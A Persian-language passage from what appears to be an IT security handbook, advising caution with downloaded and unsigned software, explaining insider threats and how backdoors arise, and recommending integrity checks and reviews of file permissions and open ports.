ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳﺘﻮﺭﻱ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ .ﺍﺩﺍﺭﺍﺗﻲ ﮐﻪ ﺍﺯ ﺣﺴﺎﺳﻴﺖ ﺑﺎﻻﻳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﺑﺎﻳـﺪ ﺍﺯ ﺍﺟـﺮﺍﻱ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﻛـﻪ
ﺍﻣﻀﺎﻱ ﺭﻣﺰﺷﺪﺓ ﻳﻚ ﻧﻮﻳﺴﻨﺪﺓ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺭﺍ ﻧﺪﺍﺭﻧﺪ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻨﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻟﺰﻭﻣﹰﺎ ﺷﻤﺎ ﺭﺍ ﻣﺤﺎﻓﻈﺖ ﻧﻤﻲﻛﻨﺪ ،ﻭﻟﻲ ﺍﮔﺮ ﻣﺸﻜﻠﻲ ﭘﻴﺶ
ﺁﻳﺪ ﻛﺴﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻭ ﺭﺍ ﻣﺴﺌﻮﻝ ﺑﺪﺍﻧﻴﺪ.
ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻫﻴﭽﮕﺎﻩ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﻭ ﻛﺎﻣﭙﺎﻳﻞﺷﺪﻩ ﺭﺍ downloadﻧﻜﻨﻴﺪ ،ﺑﻠﻜﻪ ﺩﺭ ﻣﻮﺭﺩ ﺗﻤﺎﻡ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ،ﻗﺒـﻞ ﺍﺯ
ﺍﻳﻨﻜﻪ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺟﺪﻳﺪ ﺭﺍ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ ،ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ )ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ( ﺑﺨﻮﺍﻧﻴﺪ ﻭ ﺑﻔﻬﻤﻴﺪ .ﺍﮔﺮ ﺩﺭ ﺍﻳـﻦ ﻣﺮﺣﻠـﻪ ﺑـﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﺸﻜﻮﻙ ﺷﺪﻳﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻨﻤﺎﻳﻴﺪ ،ﺧﺼﻮﺻﹰﺎ ﺍﮔﺮ ﺑﺮﺍﻱ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻥ ﺑﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺧﺎﺹ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ،ﻭ ﻧﻜﺘـﺔ ﺁﺧـﺮ ﺍﻳﻨﻜـﻪ
ﺗﻨﻬﺎ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺧﻮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﮕﻴﺮﻳﺪ.
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﻲﺩﻟﻴﻞ ﻧﺒﺎﻳﺪ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻫﺮ ﮔﺮﻭﻩ ﻳﺎ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﺍﻋﺘﻤﺎﺩ ﻛﻨﻴﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ،ﺑـﺮﺍﻱ
ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻥ ﺍﻣﻜﺎﻥ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﻳﺎ ﺍﺣﻴﺎﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻓﺮﺍﻣﻮﺵﺷﺪﻩ ،ﺩﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ؛ ﻭ ﺑﺮﺧـﻲ
ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺗﺠﺎﻭﺯ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺍﺑﺰﺍﺭ ﺟﺎﺳﻮﺳﻲ ﺗﻌﺒﻴﻪ ﻣﻲﻛﻨﻨﺪ .ﻫﺮﭼﻨﺪ ﻣﺸﺮﻳﺎﻥ ﻋﻼﻗﻪﻣﻨﺪ ﺑﻪ ﺧﺮﻳﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻳﻲ
ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓﺮﻭﺵ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ ،ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻋﻼﻗﺔ ﻧﺎﭼﻴﺰﻱ ﺑﻪ ﻣـﺴﺌﻮﻟﻴﺖﭘـﺬﻳﺮﻱ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﻛـﻪ
ﻣﻲﻓﺮﻭﺷﻨﺪ ﺩﺍﺭﻧﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺜﻲ ﻛﻪ ﻣﻲﺧﺮﻳﺪ ﻭ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﻧﺼﺐ ﻣﻲﻛﻨﻴﺪ ﺑﺪﻧﺒﺎﻝ ﺗـﻀﻤﻴﻨﻬﺎﻱ
ﻣﻜﺘﻮﺏ ﺑﺎﺷﻴﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺁﺯﺍﺩ ﻫﻴﭻ ﺍﻳﻤﻦﺗﺮ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺘﻨﺪ ،ﻫﺮﭼﻨﺪ ﺍﻳﻦ ﻣﺰﻳﺖ ﺭﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺷـﻤﺎ
ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﺍﻛﺜﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺁﺯﺍﺩ ﻭ ﻣﺘﻦﺑﺎﺯ ﻫﻨﮕﺎﻡ ﺗﻮﻟﻴﺪ ﺑﻪ ﭼﻨﺪ ﻗﺴﻤﺖ ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﻧﺪ ﻭ ﺗﻮﺳﻂ ﭼﻨﺪﻳﻦ ﺑﺮﻧﺎﻣﻪﻧـﻮﻳﺲ ﻧﻮﺷـﺘﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ
ﻻ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺍﻳﻦ ﻗﺴﻤﺘﻬﺎ ﺑﺪﻭﻥ ﻧﻈﺎﺭﺕ ﺩﻗﻴﻖ ﺳﺎﻳﺮ ﺍﻋﻀﺎﻱ ﮔﺮﻭﻩ ،ﻣﻮﺭﺩ ﭘﺬﻳﺮﺵ ﺁﻧـﺎﻥ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ؛ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ ﻳـﻚ ﻣﻌﻤﻮ ﹰ
ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺑﺪﺧﻮﺍﻩ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻛﻮﭼﻚ ﻣﺨﺮﺏ ﺭﺍ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺑﻘﻴﻪ ﻣﺘﻮﺟﻪ ﺷﻮﻧﺪ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﺍﺿﺎﻓﻪ ﻛﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺣﺘﻲ
ﺍﮔﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻇﺮﻳﻒ ﺁﻥ ﺩﻳﺪﻩ ﻧﺸﻮﻧﺪ -ﺍﻓﺮﺍﺩ ﻛﻤﻲ ﺍﻃـﻼﻉ
ﺩﺍﺭﻧﺪ ﻛﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺩﻗﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺑﺎﺯﺑﻴﻨﻲ ﻛﺮﺩ ﻭ ﺍﮔﺮ ﻓﺮﺩ ﺑﺎﺯﺑﻴﻦ ﻭﺍﻗﻌﹰﺎ ﻋﻼﻗﻪﻣﻨﺪ ﺑﻪ ﺩﺭﻙ ﻫﻤﺔ ﺍﺟﺰﺍﻱ ﺑﺮﻧﺎﻣـﻪ ﻧﺒﺎﺷـﺪ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻣﻮﺭﺩ ﻣﺸﻜﻮﻛﻲ ﭘﻴﺪﺍ ﻧﻜﻨﺪ .ﺣﺘﻲ ﻳﻚ ﺑﺎﺯﺑﻴﻨﻲ ﻣﺴﺘﻘﻞ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ؛ ﭼﺮﺍﮐﻪ ﺑﺎﺯﺑﻴﻨﻬﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺗﺨﺼﺺ ﺍﻳﻨﮑﺎﺭ ﺭﺍ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺍﺷﺘﺒﺎﻩ ﻛﻨﻨﺪ ،ﻭ ﻳﺎ ﺣﺘﻲ ﺍﻳﻦ ﺍﻣﮑﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻪ ﻣﻴﺎﻥ ﺑﺎﺯﺑﻴﻦ ﻭ ﻧﻮﻳﺴﻨﺪﺓ ﺑﺮﻧﺎﻣﻪ ،ﺗﺒﺎﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ!
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ downloadﺷﺪﻩ ﺁﻧﻘﺪﺭ ﺑﺰﺭﮒ ﻫﺴﺘﻨﺪ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺭﻭﺵ ﻣﻌﻴﻦ ﻫﻤﺔ ﺁﻧﻬﺎ ﺭﺍ ﺧﻮﺍﻧﺪ .ﻋـﻼﻭﻩ ﺑـﺮ
ﺍﻳﻦ ﻫﺮﭼﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺑﺎﺯ ﻗﺎﺑﻞ downloadﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮐﺎﺭﺑﺮﺍﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻴﺶﺗﺮﺟﻤﻪ ﺭﺍ ﺑـﺮﺍﻱ
downloadﺍﻧﺘﺨﺎﺏ ﻣﻲﻛﻨﻨﺪ .ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻛﻪ ﺑﻪ ﺯﺑﺎﻥ ﻣﺎﺷﻴﻦ ﺩﺭﺁﻣﺪﻩﺍﻧﺪ ﺍﺯ ﺭﻭﻱ ﻫﻤﺎﻥ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﺔ
ﻣﻮﺭﺩ ﺍﺩﻋﺎ ﺗﻮﻟﻴﺪ ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﻧﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﻩ ﺟﺎﻳﮕﺰﻳﻦ ﺑﺮﺍﻱ ﺑﺎﺯﺑﻴﻨﻲ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﭘﻴﺸﺘﺮ ﺩﻳﮕﺮﺍﻥ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﺘﻤـﺎﺩ ﻛـﺮﺩﻩﺍﻧـﺪ .ﺍﻳـﻦ ﺭﻭﺵ
ﭼﻨﺪﺍﻥ ﻣﻄﻤﺌﻦ ﻧﻴﺴﺖ ،ﭼﻮﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪ ﺩﺍﺭﺍﻱ ﺗﻬﺪﻳﺪﻱ ﺑﺎﺷﺪ ﻛﻪ ﺑﺮﺍﻱ ﺩﻳﮕﺮﺍﻥ ﺍﺗﻔﺎﻕ ﻧﻤﻲﺍﻓﺘﺪ ﻭﻟﻲ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘـﺪ؛ ﻳـﺎ
ﺣﺘﻲ ﺗﻬﺪﻳﺪ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘﺪ ،ﻭﻟﻲ ﻛﺴﻲ ﻣﺘﻮﺟﻪ ﺁﻥ ﻧﺸﻮﺩ.
ﻃﺒﻖ ﻳﻚ ﺳﻴﺎﺳﺖ ﻣﻨﺎﺳﺐ ،ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪ ﺑﺎﻳﺪ ﺍﺑﺘﺪﺍ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻏﻴﺮﺣﺴﺎﺱ ﻧﺼﺐ ﻭ ﺁﺯﻣﺎﻳﺶ ﺷﻮﻧﺪ .ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻓﺮﺻﺖ ﻣﻲﻳﺎﺑﻴﺪ
ﻣﺸﻜﻼﺕ ،ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎ ﻭ ﺭﻓﺘﺎﺭﻫﺎﻱ ﻏﻴﺮﻋﺎﺩﻱ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ .ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺟﺪﻳﺪ ﺭﺍ ﺍﺑﺘﺪﺍ ﺭﻭﻱ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺗﻮﻟﻴـﺪ ﭘﻮﻳـﺎ
ﻧﺼﺐ ﻧﻜﻨﻴﺪ ،ﻭ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺑﺎ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻳﺎ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻧﻴﺎﻭﺭﻳﺪ ،ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻭﺍﻗﻌـﹰﺎ ﭼـﺎﺭﺓ ﺩﻳﮕـﺮﻱ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤١٨
ﺍﮔﺮ ﺷﺨﺼﻲ ﺑﺎ ﺩﺍﻧﺶ ﻛﺎﻓﻲ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﻗﺼﺪ ﺧﺮﺍﺑﻜﺎﺭﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ،
ﺑﻤﺒﻬﺎﻱ ﻣﻨﻄﻘﻲ ،٣٢٥ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺑﻨﻮﻳﺴﺪ ﻭ ﺁﻧﺮﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻫﺪﻑ ﻧﺼﺐ ﻛﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﻤﺎ ﺗﻬﺪﻳﺪ ﺑﺰﺭﮔﻲ ﺑﺮﺍﻱ
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻲﺑﺎﺷﻨﺪ :ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﺎ ﺳﻴﺴﺘﻢ ﺁﺷﻨﺎ ﻫﺴﺘﻨﺪ ،ﻧﻘﺎﻁ ﺿﻌﻒ ﺁﻧﺮﺍ ﻣﻲﺷﻨﺎﺳﻨﺪ ،ﻭ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻭ ﺑـﺎﺯﺑﻴﻨﻲ ﻣﻮﺟـﻮﺩ
ﻻ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﻭ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﻓﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ .ﺷـﺎﻳﺪ ﺑـﻪ ﺁﺷﻨﺎﻳﻲ ﺩﺍﺭﻧﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﻣﻌﻤﻮ ﹰ
ﻧﻈﺮ ﺧﻨﺪﻩﺩﺍﺭ ﺑﻴﺎﻳﺪ ﻛﻪ ﮔﻔﺘﻪ ﺷﻮﺩ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ،ﺷﺨﺺ ﻣﺴﺌﻮﻝ ﻛﻨﺘﺮﻝ ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺖ ﻫﻤﺎﻥ ﮐﺴﻲ ﺍﺳﺖ ﻛـﻪ ﺍﮔـﺮ ﺑﺨﻮﺍﻫـﺪ
ﻻ ﻫﻴﭽﮕﻮﻧﻪ ﻣﻤﻴـﺰﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺟﺮﺍﻱ ﭼﻨﺪ ﺩﺳﺘﻮﺭ ،ﺑﻴﺸﺘﺮﻳﻦ ﺧﺴﺎﺭﺗﻬﺎ ﺭﺍ ﺑﻪ ﻛﻞ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﻛﻨﺪ .ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺳﻴﺴﺘﻢ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ
ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺑﺮﺭﺳﻴﻬﺎ ﺍﻧﺠﺎﻡ ﻧﻤﻲﮔﻴﺮﺩ.
ﺍﻛﺜﺮ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﺟﺮﺍ ﻧﻴﺎﺯ ﺑﻪ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻃﻮﻻﻧﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﺎ ﻭﺭﻭﺩ ﺍﻃﻼﻋـﺎﺕ
ﺯﻳﺎﺩ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺩﺍﺭﻧﺪ .ﺩﺭ ﺯﻣﺎﻥ ﺍﺷﻜﺎﻝﺯﺩﺍﻳﻲ ﺑﺮﻧﺎﻣﻪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺑﺨﻮﺍﻫـﺪ ﺍﺯ ﺩﺳﺘﺮﺳـﻴﻬﺎﻱ ﺧﺎﺻـﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﺪ ،ﻳـﺎ
ﻣﺮﺍﺣﻞ ﻃﻮﻻﻧﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﺎ ﻭﺭﻭﺩ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﺪﻫﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﺻﻮﺭﺕ ﻛﺎﺭ ﻧﻜـﺮﺩﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ،ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺑﺨﻮﺍﻫﺪ ﺍﺯ ﻃﺮﻳﻖ ﺧﻮﺩ ﺑﺮﻧﺎﻣﻪ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺩﺭﺏ ﻣﺨﻔـﻲ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺍﺳـﺖ
ﻛﻪ ﻳﺎ ﺑﺮ ﺍﺛﺮ ﻭﺭﻭﺩ ﻳﻚ ﺭﺷﺘﺔ ﺧﺎﺹ ﻭ ﻳﺎ ﺍﺟﺮﺍ ﺗﺤﺖ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺧﺎﺹ ،ﻓﻌﺎﻝ ﻣﻲﺷﻮﺩ ﻭ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺍﻋﻄﺎ ﻣﻲﻛﻨﺪ.
ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻭﻗﺘﻲ ﺧﻄﺮﻧﺎﻙ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﻧﺎﺍﻫﻞ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ.
ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺍﻭﻟﻴﻪ ﭘﺲ ﺍﺯ ﺗﻜﻤﻴﻞ ﺑﺮﻧﺎﻣﻪ ﻓﺮﺍﻣﻮﺵ ﻛﻨﺪ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺭﺍ ﺣﺬﻑ ﻛﻨﺪ ﻭ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﭘﻲ ﺑـﻪ ﻭﺟـﻮﺩ ﺁﻧﻬـﺎ
ﺑﺒﺮﺩ ﺍﻳﻦ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﻣﺸﻜﻠﺴﺎﺯ ﻣﻲﺷﻮﻧﺪ .ﮔﺎﻫﻲ ﻧﻴﺰ ﻳﻚ ﻣﻬﺎﺟﻢ ﭘﺲ ﺍﺯ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢ ،ﻳﻚ ﺩﺭﺏ ﻣﺨﻔﻲ ﺩﺭ ﺁﻥ ﺍﻳﺠﺎﺩ
ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻌﺪﹰﺍ ﺑﺘﻮﺍﻧﺪ ﺩﻭﺑﺎﺭﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﺷﺪﻩ ﻭ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ.
ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ .ﺑﻬﺘﺮﻳﻦ ﺩﻓﺎﻉ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬـﻢ ﺭﺍ ﻣﺮﺗﺒـﹰﺎ ﺑﺮﺭﺳـﻲ
ﻛﻨﻴﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺑﺮﺭﺳﻲ ﻓﺎﻳﻠﻬﺎ ،ﺑﺎﻳﺪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻪ ﺩﻧﺒﺎﻝ ﻓﺎﻳﻠﻬﺎﻱ ﺍﻣﺘﻴﺎﺯﺩﺍﺭ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﺑﺎﺯ TCP/IPﺑﮕﺮﺩﻳـﺪ ﻭ ﻣﺘﻨﺎﻭﺑـﹰﺎ ﻣﺠﻮﺯﻫـﺎ ﻭ
ﻣﺎﻟﻜﻴﺖ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﻣﻬﻢ ﺭﺍ ﻧﻴﺰ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻣﺮﻭﺯﻩ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﺣﺘﻲ ﻧﺸﺎﻧﻪﻫﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ ﺭﺍ
